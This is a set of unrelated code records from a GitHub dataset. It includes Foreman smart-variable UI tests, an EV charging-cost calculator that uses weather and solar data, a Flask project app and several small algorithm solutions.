host.add_puppetclass(data={'puppetclass_id': puppet_class.id})\n return host\n\n\n@fixture(scope='module')\ndef domain(module_host):\n return entities.Domain(id=module_host.domain.id).read()\n\n\n@tier2\n@upgrade\ndef test_positive_create_with_host(session, puppet_class, module_host):\n \"\"\"Creates a Smart Variable and associate it with host.\n\n :id: 4a8589bf-7b11-48e8-a25d-984bea2ba676\n\n :steps: Creates a smart variable with valid name and default value.\n\n :expectedresults:\n\n 1. The smart Variable is created successfully.\n 2. In YAML output of associated host, the variable with name and\n its default value is displayed.\n 3. In Host-> variables tab, the smart variable should be displayed\n with its respective puppet class.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n value = gen_string('alpha')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': value,\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == value\n host_values = session.host.read(module_host.name)\n smart_variable = next((\n item\n for item in host_values['parameters']['puppet_class_parameters']\n if item['Name'] == name\n ))\n assert smart_variable['Puppet Class'] == puppet_class.name\n assert smart_variable['Value'] == value\n\n\n@tier2\ndef test_positive_create_matcher(session, puppet_class, module_host):\n \"\"\"Create a Smart Variable with matcher.\n\n :id: 42113584-d2db-4b91-8775-06bffee36be4\n\n :steps:\n\n 1. Create a smart Variable with valid name and default value.\n 2. Create a matcher for Host attribute with valid value.\n\n :expectedresults:\n\n 1. The smart Variable with matcher is created successfully.\n 2. In YAML output, the variable name with overrided value for host\n is displayed.\n 3. In Host-> variables tab, the variable name with overrided value\n for host is displayed.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n default_value = gen_string('alpha')\n override_value = gen_string('alphanumeric')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': default_value,\n 'variable.matchers': [\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'fqdn',\n 'matcher_attribute_value': module_host.name\n },\n 'Value': override_value\n }\n ]\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == override_value\n host_values = session.host.read(module_host.name)\n smart_variable = next((\n item\n for item in host_values['parameters']['puppet_class_parameters']\n if item['Name'] == name\n ))\n assert smart_variable['Value'] == override_value\n\n\n@tier2\ndef test_positive_create_matcher_attribute_priority(\n session, puppet_class, module_host, domain):\n \"\"\"Matcher Value set on Attribute Priority for Host - alternate\n priority.\n\n :id: 65144295-f0ca-4bd0-ae01-96c50ca829fe\n\n :steps:\n\n 1. Create variable with some default value.\n 2. Set some attribute(other than fqdn) as top priority attribute.\n Note - The fqdn/host should have this attribute.\n 3. Create first matcher for fqdn with valid details.\n 4. 
Create second matcher for attribute of step 2 with valid\n details.\n 5. Submit the change.\n 6. Go to YAML output of associated host.\n\n :expectedresults:\n\n 1. The YAML output has the value only for step 4 matcher.\n 2. The YAML output doesn't have value for fqdn/host matcher.\n\n :CaseLevel: Integration\n \"\"\"\n name = gen_string('alpha')\n override_value = gen_string('alphanumeric')\n override_value2 = gen_string('alphanumeric')\n with session:\n session.smartvariable.create({\n 'variable.key': name,\n 'variable.puppet_class': puppet_class.name,\n 'variable.default_value': gen_string('alpha'),\n 'variable.prioritize_attribute_order.order': '\\n'.join(\n ['domain', 'hostgroup', 'os', 'fqdn']),\n 'variable.matchers': [\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'fqdn',\n 'matcher_attribute_value': module_host.name\n },\n 'Value': override_value\n },\n {\n 'Attribute type': {\n 'matcher_attribute_type': 'domain',\n 'matcher_attribute_value': domain.name\n },\n 'Value': override_value2\n }\n ]\n })\n assert session.smartvariable.search(name)[0]['Variable'] == name\n output = yaml.load(session.host.read_yaml_output(module_host.name))\n output_scp = output['parameters'][name]\n assert output_scp == override_value2\n","repo_name":"sghai/robottelo","sub_path":"tests/foreman/ui_airgun/test_smartvariable.py","file_name":"test_smartvariable.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"9697396683","text":"import requests\nfrom datetime import datetime, timedelta\nimport holidays\n\n\"\"\"\nThis file consist of a Calculator class and its methods to calculate the charging cost.\n\"\"\"\n\nclass Calculator():\n \"\"\"\n Calculator class for the Joules Up EV Charging Calculator\n \"\"\"\n # you can choose to initialise variables here, if needed.\n period = 1\n power = 0\n price = 0\n duration = 0\n start_time = \"00:00\"\n\n def __init__(self):\n pass\n\n def cost_calculation(self, date, start_time, initial_state, final_state, capacity, charger_config):\n \"\"\"\n This function is used to calculate the charging cost based on the formula in our assignment 2 specs\n Cost = ( Final SoC - Initial SoC ) * Capacity * Base Price * Surcharge\n \"\"\"\n # format the date into an accepted date for the functions\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n # find the charger configuration for the charger\n Calculator.get_charger_configuration(self, charger_config)\n current = datetime.strptime(start_time, \"%H:%M\")\n\n # check for peak time and holiday\n if Calculator.is_peak(self, current):\n price = Calculator.price * 2\n else:\n price = Calculator.price\n\n if Calculator.is_holiday(self, ref_date):\n surcharge_factor = 1.1\n else:\n surcharge_factor = 1\n\n # calculate the cost using the formula\n cost = (float(final_state) - float(initial_state)) / 100 * float(capacity) * float(price) / 100 * surcharge_factor\n return \"{:.2f}\".format(cost)\n\n def cost_cal_without_hourly_weather(self, date, postcode, start_time, charging_duration, charger_configuration, initial_state, final_state, location):\n \"\"\"\n This function calculate the cost from 1st July 2008 up to the current date-2 only. 
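As a worked example of the formula below (hypothetical numbers): SoC = (80 - 20)/100 = 0.6, a net energy of 2.0 kWh for one hour, the holiday surcharge of 1.1 and the off-peak price of 0.5 give 0.6 * 2.0 * 1.1 * 0.5 = 0.66 for that hour's contribution to the total cost.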
The calculation is done without\n considering hourly weather conditions.\n Formula : SoC * Net_energy * surcharge * price\n \"\"\"\n total_cost = 0\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n Calculator.get_charger_configuration(self, charger_configuration)\n # calculate the solar energy\n energy = Calculator.solar_energy_cal_without_future(self, ref_date, postcode, start_time, charging_duration, location)\n # energy is a tuple while the first element is the solar energy and second element is the duration of each\n # partial hour\n solar_energy = energy[0]\n du = energy[1]\n price = Calculator.get_price(self)\n # calculate the cost for each partial hour\n for i in range(len(solar_energy)):\n solar = solar_energy[i]\n energy_drawn = Calculator.power * du[i]\n net_energy = energy_drawn - float(solar)\n soc = (int(final_state) - int(initial_state))/100\n if Calculator.is_holiday(self, ref_date):\n surcharge = 1.1\n else:\n surcharge = 1.0\n\n if net_energy <= 0:\n total_cost += 0\n else:\n total_cost += soc * net_energy * surcharge * price[i]\n\n return \"{:.2f}\".format(total_cost)\n\n def cost_cal_with_hourly_weather(self, date, postcode, start_time, charging_duration, charger_configuration,\n initial_state, final_state, location):\n \"\"\"\n This function calculate the charging cost with the addition of solar energy generation, with the date extending\n to the future. Moreover, the calculation needs to take into account hourly weather conditions.\n Formula: soc * net_energy * surcharge * price\n \"\"\"\n total_cost = 0\n formatted_date = Calculator.format_date(self, date)\n ref_date = Calculator.check_date(self, formatted_date)\n Calculator.get_charger_configuration(self, charger_configuration)\n # find the solar energy for each years and the duration of each solar energy period\n energy = Calculator.solar_energy_cal_preceeding_years(self, ref_date, postcode, start_time, charging_duration, location)\n price = Calculator.get_price(self)\n # calculate the cost for each period and sum them up\n for i in range(len(energy)):\n info = energy[i]\n for j in range(len(info)):\n if len(info[0]) > 1:\n solar = info[0]\n du = info[1]\n solar_energy = solar[j]\n energy_drawn = Calculator.power * du[j]\n else:\n solar = info[0]\n du = info[1]\n solar_energy = solar[0]\n energy_drawn = Calculator.power * du[0]\n\n net_energy = energy_drawn - float(solar_energy)\n soc = (int(final_state) - int(initial_state)) / 100\n if Calculator.is_holiday(self, ref_date):\n surcharge = 1.1\n else:\n surcharge = 1.0\n\n if net_energy <= 0:\n total_cost += 0\n else:\n if len(info[0]) > 1:\n total_cost += soc * net_energy * surcharge * price[j]\n else:\n total_cost += soc * net_energy * surcharge * price[0]\n return \"{:.2f}\".format(total_cost)\n\n def get_price(self):\n \"\"\"\n This function finds the price of each period.\n e.g. 
[0.5, 0.5] represents half price for both period\n \"\"\"\n price = []\n duration = Calculator.duration\n start_time = Calculator.start_time\n remaining_time = duration\n start_time = datetime.strptime(start_time, '%H:%M')\n # keep running until there are no time remaining\n # finds how long does each period last\n while remaining_time > 0:\n if Calculator.is_peak(self, start_time):\n price.append(1.0)\n else:\n price.append(0.5)\n hours = 1\n hours_added = timedelta(hours=hours)\n temp = start_time + hours_added\n next_hr = temp.hour\n next_hr_min = \"00\"\n temp2 = [str(next_hr), next_hr_min]\n next_hr_str = \":\".join(temp2)\n next_hour = datetime.strptime(next_hr_str, '%H:%M')\n time_to_next_hour = abs(next_hour - start_time).total_seconds() / 60.0\n\n dur = min(time_to_next_hour, remaining_time)\n remaining_time = remaining_time - dur\n start_time = next_hour\n\n return price\n\n # you may add more parameters if needed, you may also modify the formula.\n def time_calculation(self, initial_state, final_state, capacity, power):\n \"\"\"\n This function calculates the total time for the whole charging period\n \"\"\"\n time = ((float(final_state) - float(initial_state)) / 100 * float(capacity) / float(power)) * 60\n time_str = \"{:.2f}\".format(time)\n return time_str\n\n # you may create some new methods at your convenience, or modify these methods, or choose not to use them.\n def is_holiday(self, start_date):\n \"\"\"\n This functions checks if a date is a holiday in Australia\n \"\"\"\n date = Calculator.format_date(self, start_date)\n ref_date = Calculator.check_date(self, date)\n aus_holidays = holidays.AUS()\n if ref_date in aus_holidays:\n return True\n return False\n\n def is_peak(self, start_time):\n \"\"\"\n This function checks if a time is a peak hour\n \"\"\"\n peak_start = \"06:00\"\n peak_end = \"18:00\"\n peak_start_time = datetime.strptime(peak_start, '%H:%M')\n peak_end_time = datetime.strptime(peak_end, '%H:%M')\n return peak_start_time <= start_time < peak_end_time\n\n def get_charger_configuration(self, charger_config):\n \"\"\"\n This functions finds our the power and base price based on the charger configuration.\n \"\"\"\n config = int(charger_config)\n if config == 1:\n Calculator.power = 2\n Calculator.price = 5\n elif config == 2:\n Calculator.power = 3.6\n Calculator.price = 7.5\n elif config == 3:\n Calculator.power = 7.2\n Calculator.price = 10\n elif config == 4:\n Calculator.power = 11\n Calculator.price = 12.5\n elif config == 5:\n Calculator.power = 22\n Calculator.price = 15\n elif config == 6:\n Calculator.power = 36\n Calculator.price = 20\n elif config == 7:\n Calculator.power = 90\n Calculator.price = 30\n else:\n Calculator.power = 350\n Calculator.price = 50\n\n return Calculator.power\n\n def get_solar_energy_duration(self, data, start_time, charging_duration):\n \"\"\"\n This function checks if the whole charging duration is during the the solar period and return the amount of\n time in the solar period.\n e.g. Starts from 5 a.m. and have a duration of 3 hours. The sunrise is at 6:30 a.m. 
Hence, the final duration\n is only 1.5 hours.\n \"\"\"\n # check if the whole charging duration is during the solar period\n sunset = data[\"sunset\"]\n sunrise = data[\"sunrise\"]\n\n sunset_time = datetime.strptime(sunset, '%H:%M:%S')\n sunrise_time = datetime.strptime(sunrise, '%H:%M:%S')\n start_time = datetime.strptime(start_time, '%H:%M')\n\n # convert the charging session\n hours = int(float(charging_duration)) // 60\n\n # Get additional minutes with modulus\n minutes = int(float(charging_duration)) % 60\n\n # Create time as a string\n charging_session_str = \"{}:{}\".format(hours, minutes)\n charging_session_final = datetime.strptime(charging_session_str, '%H:%M')\n time_zero = datetime.strptime('00:00', '%H:%M')\n end_time = start_time - time_zero + charging_session_final\n duration = 0\n\n if start_time > sunset_time or end_time < sunrise_time:\n duration = 0\n # whole session in daylight\n elif sunrise_time < start_time < sunset_time and sunrise_time < end_time < sunset_time:\n duration = (charging_session_final.hour * 60) + charging_session_final.minute\n\n hour = start_time.hour\n minute = start_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n # start_time before sunrise but end_time before sunset\n elif start_time < sunrise_time and end_time < sunset_time:\n cal = end_time - timedelta(hours=sunrise_time.hour, minutes=sunrise_time.minute,\n seconds=sunrise_time.second)\n duration = (cal.hour * 60) + cal.minute\n hour = sunrise_time.hour\n minute = sunrise_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n\n # start_time after sunrise but end_time after sunset\n elif start_time > sunrise_time and end_time > sunset_time:\n cal = sunset_time - timedelta(hours=start_time.hour, minutes=start_time.minute, seconds=start_time.second)\n duration = (cal.hour * 60) + cal.minute\n\n hour = start_time.hour\n minute = start_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n\n Calculator.duration = duration\n return duration\n\n # to be acquired through API\n def get_day_light_length(self, data):\n \"\"\"\n This function calculates the daylight length based on the time of sunrise and sunset.\n \"\"\"\n\n sunset = data[\"sunset\"]\n sunrise = data[\"sunrise\"]\n\n sunset_time = datetime.strptime(sunset, '%H:%M:%S')\n sunrise_time = datetime.strptime(sunrise, '%H:%M:%S')\n daylight_len = sunset_time - sunrise_time\n str_day_len = str(daylight_len)\n temp = str_day_len.split(\":\")\n minutes = int(temp[1])/60\n dl = int(temp[0]) + minutes\n format_dl = \"{:.4f}\".format(dl)\n return format_dl\n\n # to be acquired through API\n def get_solar_insolation(self, data):\n \"\"\"\n This function finds the solar insolation from the weather API\n \"\"\"\n solar_insolation = data[\"sunHours\"]\n return solar_insolation\n\n # to be acquired through API\n def get_cloud_cover(self, data, start_time):\n \"\"\"\n This function retrieve hourly cloud value from the weather API\n \"\"\"\n cloud_cover = data[\"hourlyWeatherHistory\"][int(start_time)][\"cloudCoverPct\"]\n return cloud_cover\n\n def solar_energy_cal_without_future(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy only considering the date from 1st July 2008 up to the current date-2\n only without considering hourly weather conditions.\n Formula : si * du/dl * 50 
* 0.20\n \"\"\"\n # calculate the solar energy based on ALG 1\n total = 0\n final_total = []\n weather_data = Calculator.get_link_weather(self, postcode)\n # retrieve data from the weather API\n data = Calculator.get_weather(self, weather_data, date, location)\n # retrieve solar insolation\n si = Calculator.get_solar_insolation(self, data)\n # retrieve daylight length\n dl = Calculator.get_day_light_length(self, data)\n # calculate the duration\n Calculator.get_solar_energy_duration(self, data, start_time, charging_duration)\n du = Calculator.get_du(self)\n # calculate the solar energy for each partial period\n for i in range(len(du)):\n total = float(si) * du[i] / float(dl) * 50 * 0.2\n final_total.append(\"{:.4f}\".format(total))\n return final_total, du\n\n def get_du(self):\n \"\"\"\n This function splits the charging session into per-hour portions and returns an\n array with the fraction of each hour that is used\n e.g. [1.0, 0.5] represents one full hour + 30 min in the second period\n \"\"\"\n du = []\n duration = Calculator.duration\n start_time = Calculator.start_time\n remaining_time = duration\n start_time = datetime.strptime(start_time, '%H:%M')\n while remaining_time > 0:\n hours = 1\n hours_added = timedelta(hours=hours)\n temp = start_time + hours_added\n next_hr = temp.hour\n next_hr_min = \"00\"\n temp2 = [str(next_hr), next_hr_min]\n next_hr_str = \":\".join(temp2)\n next_hour = datetime.strptime(next_hr_str, '%H:%M')\n time_to_next_hour = abs(next_hour - start_time).total_seconds() / 60.0\n\n dur = min(time_to_next_hour, remaining_time)\n duration = dur / 60\n remaining_time = remaining_time - dur\n start_time = next_hour\n du.append(duration)\n return du\n
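\n # A quick worked example of get_du (values assumed for illustration): with\n # Calculator.start_time = '08:30' and Calculator.duration = 90 (minutes), the loop\n # first consumes the 30 minutes up to 09:00 and then one full hour, so get_du\n # returns [0.5, 1.0].\n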
\n def solar_energy_with_future(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy with the date extending into the future. Moreover, the calculation\n takes hourly weather conditions into account.\n Formula : si * du/dl * (1-cc/100) * 50 * 0.20\n \"\"\"\n # calculate the solar energy based on ALG2 for a year\n total = 0\n final_total = []\n # retrieve data from the weather api\n weather_data = Calculator.get_link_weather(self, postcode)\n data = Calculator.get_weather(self, weather_data, date, location)\n # retrieve solar insolation, daylight length and duration\n si = Calculator.get_solar_insolation(self, data)\n dl = Calculator.get_day_light_length(self, data)\n Calculator.get_solar_energy_duration(self, data, start_time, charging_duration)\n du = Calculator.get_du(self)\n \n # for each partial hour, calculate the solar energy\n for i in range(len(du)):\n temp = start_time.split(\":\")\n hr_num = int(temp[0]) + i\n cc = Calculator.get_cloud_cover(self, data, str(hr_num))\n total = float(si) * du[i] / float(dl) * (1-cc/100) * 50 * 0.2\n final_total.append(\"{:.4f}\".format(total))\n\n return final_total, du\n\n def solar_energy_cal_preceeding_years(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy for the preceding years\n \"\"\"\n total = []\n date = Calculator.format_date(self, date)\n \n # calculate the solar energy for each of the three preceding years\n for i in range(3):\n ref_date = Calculator.check_date(self, date)\n temp = ref_date.split(\"-\")\n year = int(temp[0]) - i\n temp.insert(0, str(year))\n temp.pop(1)\n ref_date2 = \"-\".join(temp)\n energy = Calculator.solar_energy_with_future(self, ref_date2, postcode, start_time, charging_duration, location)\n total.append(energy)\n\n return total\n\n def get_link_weather(self, postcode):\n \"\"\"\n This function retrieves data from the location API\n \"\"\"\n url = 'http://118.138.246.158/api/v1/location?postcode={postcode}'.format(postcode=postcode)\n temp = requests.get(url)\n data = temp.json()\n\n return data\n\n def get_weather(self, data, date, location):\n \"\"\"get information from the weather API through the postcode \"\"\"\n location = location.upper()\n for i in range(len(data)):\n location_name = data[i][\"name\"]\n if location_name == location:\n location = data[i][\"id\"]\n break\n\n ref_date = Calculator.check_date(self, date)\n weather_url = 'http://118.138.246.158/api/v1/weather?location={ID}&date={date}'.format(ID=location, date=ref_date)\n\n weather = requests.get(weather_url)\n data = weather.json()\n return data\n\n def check_date(self, date):\n \"\"\" clamp a future date back to a valid reference date\"\"\"\n current_date = datetime.today().strftime('%Y-%m-%d')\n current = current_date.split(\"-\")\n current_year = int(current[0])\n input = date.split(\"-\")\n input_year = int(input[0])\n if input_year > current_year:\n input.pop(0)\n input.insert(0, str(current_year))\n\n # check for future month\n if int(input[1]) > int(current[1]):\n current_month = int(current[1])\n input_month = int(input[1])\n if input_month > current_month:\n input.pop(1)\n input.insert(1, str(current_month))\n\n if int(input[2]) > int(current[2]):\n input.pop(2)\n input.insert(2, current[2])\n\n # check if the day is valid for that new month\n days = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if int(input[2]) > days[int(input[1])]:\n year = int(input[0])\n # leap year condition: clamp the day field in place\n is_leap = (year % 400 == 0) or (year % 100 != 0) and (year % 4 == 0)\n if is_leap and int(input[1]) == 2:\n input[2] = \"29\"\n else:\n input[2] = str(days[int(input[1])])\n date_time_obj = datetime(int(input[0]), int(input[1]), int(input[2]))\n final_time = date_time_obj.strftime(\"%Y-%m-%d\")\n return final_time\n
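\n # A quick sanity example for check_date (dates assumed for illustration): if today\n # were 2021-12-31, check_date('2025-01-15') would be clamped to '2021-01-15', and an\n # impossible day such as '2021-02-30' would come back as '2021-02-28' via the\n # day-validity branch above.\n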
\n def format_date(self, date):\n \"\"\"\n format the date into an acceptable format for the API\n \"\"\"\n temp = date.split(\"/\")\n temp.reverse()\n final_date = \"-\".join(temp)\n return final_date\n","repo_name":"sookmun/FIT2017-Software-Testing","sub_path":"app/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":20240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19596101549","text":"import autograd.numpy as np\nimport argparse\nimport json\nimport ast\n\nfrom json_parser import parse\nfrom utils import *\n\n\ndef add_assertion(args, spec):\n assertion = dict()\n\n assertion['robustness'] = 'local'\n assertion['distance'] = 'di'\n assertion['eps'] = '1e9' # eps is not necessary in this experiment\n\n spec['assert'].update(assertion)\n\n\ndef add_solver(args, spec):\n solver = dict()\n\n solver['algorithm'] = args.algorithm\n if args.algorithm == 'sprt':\n solver['threshold'] = str(args.threshold)\n solver['alpha'] = '0.05'\n solver['beta'] = '0.05'\n solver['delta'] = '0.005'\n\n spec['solver'] = solver\n\n\ndef main():\n np.set_printoptions(threshold=20)\n parser = argparse.ArgumentParser(description='nSolver')\n\n parser.add_argument('--spec', type=str, default='spec.json',\n help='the specification file')\n parser.add_argument('--algorithm', type=str,\n help='the chosen algorithm')\n parser.add_argument('--threshold', type=float,\n help='the threshold in sprt')\n parser.add_argument('--eps', type=float,\n help='the distance value')\n parser.add_argument('--dataset', type=str,\n help='the data set for fairness experiments')\n\n args = parser.parse_args()\n\n with open(args.spec, 'r') as f:\n spec = json.load(f)\n\n add_assertion(args, spec)\n add_solver(args, spec)\n\n model, assertion, solver, display = parse(spec)\n\n if args.dataset == 'bank':\n pathX = 'benchmark/causal/bank/data/'\n pathY = 'benchmark/causal/bank/data/labels.txt'\n elif args.dataset == 'census':\n pathX = 'benchmark/causal/census/data/'\n pathY = 'benchmark/causal/census/data/labels.txt'\n elif args.dataset == 'credit':\n pathX = 'benchmark/causal/credit/data/'\n pathY = 'benchmark/causal/credit/data/labels.txt'\n elif args.dataset == 'FairSquare':\n pathX = 'benchmark/causal/FairSquare/data/'\n pathY = 'benchmark/causal/FairSquare/data/labels.txt'\n\n y0s = np.array(ast.literal_eval(read(pathY)))\n\n assertion['x0'] = pathX + 'data' + str(0) + '.txt'\n\n solver.solve(model, assertion)\n\n\n print('\\n============================\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"longph1989/Socrates","sub_path":"source/run_causal.py","file_name":"run_causal.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"16968259377","text":"\nimport sys\nsys.stdin = open('1715.txt')\n\nimport heapq\n# merge with the minimum number of comparisons\n# probably needs to stay sorted? use a min-heap\n\nN = int(input())\n\nheap = []\nfor _ in range(N):\n heapq.heappush(heap, int(input()))\n\nresult = 0\nfor _ in range(N-1):\n num1 = heapq.heappop(heap)\n num2 = heapq.heappop(heap)\n sumNum = num1 + num2\n heapq.heappush(heap, sumNum)\n result += sumNum\n\nprint(result)\n
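\n# Why the greedy merge is optimal (an informal sketch): every pile's size is added to\n# the running total once for each merge it takes part in, so the two smallest piles\n# should always be merged first. E.g. for piles [10, 20, 40]: 10+20=30, then 30+40=70,\n# giving 100 in total, versus 130 if 20+40 were merged first.\n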
","repo_name":"wdahlia/Python-Algorithm","sub_path":"백준/1715_카드정렬하기.py","file_name":"1715_카드정렬하기.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"4776176518","text":"import os\nimport json\nfrom flask import Flask, render_template, url_for, request, flash, redirect\nfrom werkzeug.utils import secure_filename\nfrom flask import jsonify\n\n#My modules\nfrom config import Config\nfrom app.forms import CreateProject_form, CreateExperiment_form\nfrom app.misc import loadGans\nfrom app.projects import Project\nfrom app.experiment import Experiment\n\n# from views import projects_window\n\napp_dict = {} # main dictionary file to keep project info\n\n#UPLOAD_FOLDER = '/path/to/the/uploads'\n#ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\napp = Flask(__name__)\napp.config.from_object(Config)\n#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#projects\n@app.route(\"/\", methods = [\"GET\" , \"POST\"])\ndef projects_window():\n form = CreateProject_form()\n\n init_app()\n print(app_dict)\n\n if form.validate_on_submit():\n \n project = Project(form.projectName.data, form.projectPath.data)\n app_dict[project.name] = project.full_path\n print(\"Added project path and created a project in\", project.json_file)\n save_app_json(app_dict)\n\n #return redirect(url_for('projects_window', form = form))\n return render_template('projects.htm', form = form, app_dict = app_dict)\n\n return render_template('projects.htm', form = form, app_dict = app_dict)\n\n# Experiments\n# theProject window (a window to create experiments)\n@app.route(\"/<project_name>\", methods = [\"GET\" , \"POST\"])\ndef theProjet(project_name):\n \n # sampleDict = {\"GAN1\": \"Normal GAN\", \"GAN2\" : \"Conditional GAN\"}\n\n ganTypes = loadGans(\"json/gans.json\")\n\n #print(testArray)\n\n form = CreateExperiment_form()\n\n # update choices\n form.ganType.choices = ganTypes #[('cpp', 'C++'), ('py', 'Python')]\n print(\"object created...!\")\n project_path = app_dict[project_name]\n\n \n\n if form.validate_on_submit():\n \n exp = Experiment(form.expName.data, project_name, project_path)\n print(\"EXP Name:\", exp.expName)\n return render_template('theproject.htm', projectName=project_name, projectPath = project_path, form=form)\n\n\n return render_template('theproject.htm', projectName=project_name, projectPath = project_path, form=form)\n\n\n@app.route(\"/home/<project_name>\")\ndef home(project_name):\n #p_data = request.get_json() # get project name and path from the click of the project\n #print(p_data)\n return render_template('home.htm', projectName=project_name, projectPath = \"\")\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.htm\", title= \"About\")\n\n\n\n## access files of the OS\n@app.route(\"/upload\")\ndef upload_file():\n return render_template(\"upload.htm\")\n\n@app.route(\"/train\")\ndef train_tab():\n return render_template(\"train.htm\")\n\n@app.route(\"/interactive\")\ndef interactive():\n print(\"This is working\")\n return render_template(\"interactive.htm\")\n \n@app.route(\"/run_test_task\", methods=['POST'])\ndef test_task():\n print(\"Test task is OK...\")\n return render_template(\"train.htm\")\n\n\n@app.route('/background_process_1')\ndef background_process_1():\n try:\n print(\"Test\")\n lang = request.args.get('proglang', 0, type=str)\n if lang.lower() == 'python':\n return jsonify(result='You are good')\n\n else:\n return jsonify(result='test')\n except Exception as e:\n return str(e)\n
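\n# How a front end might call these endpoints (a sketch only - no JavaScript ships in\n# this file, so the selector and page are assumptions): from jQuery one could run\n# $.getJSON('/background_process_1', {proglang: 'python'}, function(data) {\n#     $('#result').text(data.result);\n# });\n# and the jsonify() payload above arrives as data.result.\n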
\n\n@app.route('/background_process')\ndef background_process():\n \n try:\n lang = request.args.get('proglang', 0, type=str)\n # print(\"Test\")\n if lang.lower() == 'python':\n return jsonify(result='You are wise')\n else:\n return jsonify(result='Try again.')\n except Exception as e:\n return str(e)\n\n######### Init app and save app dictionary #########\ndef init_app():\n global app_dict\n\n if os.path.isfile(\"json/app.json\"):\n\n print(\"Json file found\")\n with open(\"json/app.json\") as pf:\n # global projects_dict\n app_dict = json.load(pf)\n pf.close()\n print(app_dict)\n else:\n with open(\"json/app.json\", \"w+\") as pf:\n # global projects_dict\n json.dump(app_dict, pf)\n pf.close()\n\ndef save_app_json(app_dict):\n with open(\"json/app.json\", \"w+\") as pf:\n # global projects_dict\n json.dump(app_dict, pf)\n pf.close()\n\nif __name__ == \"__main__\":\n \n app.run(debug=True)\n ","repo_name":"vlbthambawita/GANExFlask","sub_path":"backup_all/GANEX/GANEX/ganex_main.py","file_name":"ganex_main.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6307574691","text":"from typing import List\nimport math\n\nclass Attempt:\n def maxProfit(self, prices: List[int]) -> int:\n \n n = len(prices)\n max_profits = [0] * n\n \n s = 0\n slow_profit = 0\n min_price = prices[0]\n \n for i in range(1, n):\n \n kadane = prices[i] - prices[i-1]\n \n if kadane > 0:\n \n curr_profit = max(0, prices[i] - min_price)\n curr_profit += max_profits[s-2] if s-2 >= 0 else 0\n slow_profit = max(slow_profit, curr_profit)\n \n fast_profit = kadane\n fast_profit += max_profits[i-3] if i-3 >= 0 else 0\n\n if fast_profit > slow_profit:\n s, slow_profit, min_price = i-1, fast_profit, prices[i-1]\n max_profits[i] = fast_profit\n else:\n max_profits[i] = slow_profit\n \n else:\n \n max_profits[i] = max_profits[i-1]\n \n i += 1\n \n return max_profits[-1]\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n hold, sell, cool = -math.inf, 0, 0\n \n for price in prices:\n prev_hold, prev_sell, prev_cool = hold, sell, cool\n \n hold = max(prev_hold, prev_cool - price)\n sell = prev_hold + price\n cool = max(prev_cool, prev_sell)\n \n return max(cool, sell)\n\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-cooldown/discuss/761981/PythonGo-O(n)-by-DP-and-state-machine.-w-Visualization","repo_name":"oscarchankalung/leetcode","sub_path":"Solutions/13 Dynamic Programming/309 Best Time to Buy and Sell Stock with Cooldown.py","file_name":"309 Best Time to Buy and Sell Stock with Cooldown.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74032780908","text":"############\n# This is the part for the theoretical question:\n# You are given a string, s. Let's define a subsequence as the subset of characters \n# that respects the order we find them in s. For instance, a subsequence of \"DATAMINING\" \n# is \"TMNN\". Your goal is to define and implement an algorithm that finds the length of \n# the longest possible subsequence that can be read in the same way forward and backwards. 
